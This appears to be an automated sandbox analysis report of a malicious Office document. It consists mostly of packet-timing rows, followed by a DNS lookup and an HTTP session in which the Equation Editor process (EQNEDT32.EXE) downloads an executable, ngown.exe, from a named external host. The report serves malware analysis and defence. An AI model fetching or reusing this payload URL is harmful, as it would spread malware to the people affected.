                          Dec 13, 2024 17:54:41.704492092 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.705331087 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.705387115 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.705394030 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.705439091 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.706278086 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.706346989 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.706371069 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.706423998 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.707298040 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.707357883 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.707374096 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.707417965 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.708389044 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.708451033 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.708534002 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.708580017 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.709286928 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.709342003 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.709373951 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.709414959 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.710264921 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.710315943 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.710356951 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.710398912 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.711234093 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.711282969 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.711416006 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.711457968 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.712224007 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.712272882 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.712388992 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.712439060 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.713232040 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.713280916 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.713304043 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.713346004 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.714272976 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.714318037 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.714322090 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.714354038 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.715229034 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.715289116 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.715290070 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.715347052 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.716198921 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.716248989 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.716320038 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.716365099 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.717227936 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.090050936 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.090091944 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.090711117 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.090729952 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.090754032 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.090764999 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.091764927 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.091778994 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.091799974 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.091808081 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.092746973 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.092763901 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.092787981 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.092799902 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.093667030 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.093699932 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.094058990 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.094096899 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.094656944 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.094702959 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.095248938 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.095292091 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.095896006 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.095931053 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.095932961 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.095964909 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.096628904 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.096668005 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.096709013 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.096740961 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.097771883 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.097817898 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.097836018 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.097870111 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.098750114 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.098787069 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.098838091 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.098870039 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.099684954 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.099725008 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.099844933 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.099884987 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.100701094 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.100744009 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.100805044 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.100841045 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.101723909 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.101739883 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.101762056 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.101778984 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.102643967 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.102654934 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.102679014 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.102699041 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.103579998 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.103614092 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.103781939 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.104104042 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.104554892 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.104589939 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.104763985 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.104796886 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.105642080 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.105689049 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.105787992 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.105825901 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.106579065 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.106596947 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.106628895 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.106772900 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.107547998 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.107599974 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.107686043 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.107728004 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.108596087 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.108647108 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.108695030 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.108733892 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.109507084 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.109563112 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.109710932 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.109750986 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.110519886 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.110565901 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.110629082 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.110673904 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.111663103 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.111685038 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.111716986 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.111733913 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.112520933 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.112571955 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.112626076 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.112668037 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.113493919 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.113540888 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.113600016 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.113639116 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.114480019 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.114531994 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.114566088 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.114608049 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.115489006 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.115536928 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.115628004 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.115669012 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.116400003 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.116450071 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.116583109 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.116622925 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.117468119 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.117516041 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.117595911 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.117635965 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.118421078 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.118468046 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.118519068 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.118557930 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.119533062 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.119579077 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.120330095 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.120361090 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.120373011 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.120398998 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.120412111 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.120454073 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.121494055 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.121514082 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.121550083 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.122397900 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.122427940 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.122440100 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.122478008 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.122514963 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.123369932 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.123416901 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.123462915 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.123501062 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.124511957 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.124586105 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.264606953 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.264626026 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.264682055 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.265089035 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.265100002 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.265131950 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.266057014 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.266068935 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.266098976 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.267088890 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.267101049 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.267147064 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.268121004 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.268132925 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.268165112 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.269026995 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.269038916 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.269072056 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.270081997 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.270093918 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.270123959 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.271059990 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.271071911 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.271104097 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.271116018 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.272017002 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.272028923 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.272061110 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.273030996 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.273041964 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.273068905 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.273078918 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.274046898 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.274058104 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.274086952 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.275043964 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.275055885 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.275082111 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.276010990 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.276022911 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.276047945 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.277013063 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.277024984 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.277055979 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.278101921 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.278112888 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.278145075 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.279011965 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.279023886 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.279052019 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.279934883 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.279947042 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.279973984 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.279982090 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.280901909 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.280920982 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.280951977 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.280961990 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.282001019 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.282012939 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.282043934 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.282979012 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.282990932 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.283018112 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.283025980 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.283878088 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.283895969 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.283948898 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.284950018 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.284960985 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.284989119 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.285979033 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.285990953 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.286024094 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.286953926 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.286964893 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.286995888 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.287864923 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.287875891 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.287908077 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.288903952 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.288917065 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.288944960 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.289858103 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.289870024 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.289904118 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.290791035 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.290829897 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.291388035 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.291429996 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.291898012 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.291909933 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.291941881 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.292829037 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.292840958 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.292875051 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.293857098 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.293874025 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.293910027 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.293910027 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.294848919 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.294861078 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.294891119 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.295923948 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.295936108 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.295969009 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.296838045 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.296849966 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.296901941 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.297705889 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.297758102 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.297947884 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.297990084 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.298739910 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.298752069 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.298782110 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.299743891 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.299761057 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.299784899 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.299802065 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.300848007 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.300859928 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.300888062 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.300900936 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.301696062 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.301738977 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.301903963 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.301944017 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.302638054 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.302687883 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:45.519542933 CET4916180192.168.2.22190.90.160.170
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 13, 2024 17:54:38.217216969 CET | 54562 | 53 | 192.168.2.22 | 8.8.8.8
Dec 13, 2024 17:54:38.961677074 CET | 53 | 54562 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 13, 2024 17:54:38.217216969 CET | 192.168.2.22 | 8.8.8.8 | 0x3fa1 | Standard query (0) | aquafusion.com.co | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 13, 2024 17:54:38.961677074 CET | 8.8.8.8 | 192.168.2.22 | 0x3fa1 | No error (0) | aquafusion.com.co |  | 190.90.160.170 | A (IP address) | IN (0x0001) | false
                          • aquafusion.com.co
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49161 | 190.90.160.170 | 80 | 3412 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 17:54:39.097635984 CET | 318 | OUT |
    GET /ngbx/ngown.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: aquafusion.com.co
    Connection: Keep-Alive
Dec 13, 2024 17:54:40.341106892 CET | 264 | IN |
    HTTP/1.1 200 OK
    Connection: Keep-Alive
    Keep-Alive: timeout=5, max=100
    content-type: application/x-msdownload
    last-modified: Tue, 10 Dec 2024 07:12:19 GMT
    accept-ranges: bytes
    content-length: 1051136
    date: Fri, 13 Dec 2024 16:54:40 GMT
    server: LiteSpeed
                          Data Ascii: wH/HHWQ7<Ht$Du3du8hu=PuBD$;FtDP3@_^[]3wDHwdHwh<HwP<HL$NUE(SV5XLW,~XLS]



                          Target ID:0
                          Start time:11:53:46
                          Start date:13/12/2024
                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          Wow64 process (32bit):false
                          Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                          Imagebase:0x13f690000
                          File size:28'253'536 bytes
                          MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:false

                          Target ID:2
                          Start time:11:54:35
                          Start date:13/12/2024
                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                          Imagebase:0x400000
                          File size:543'304 bytes
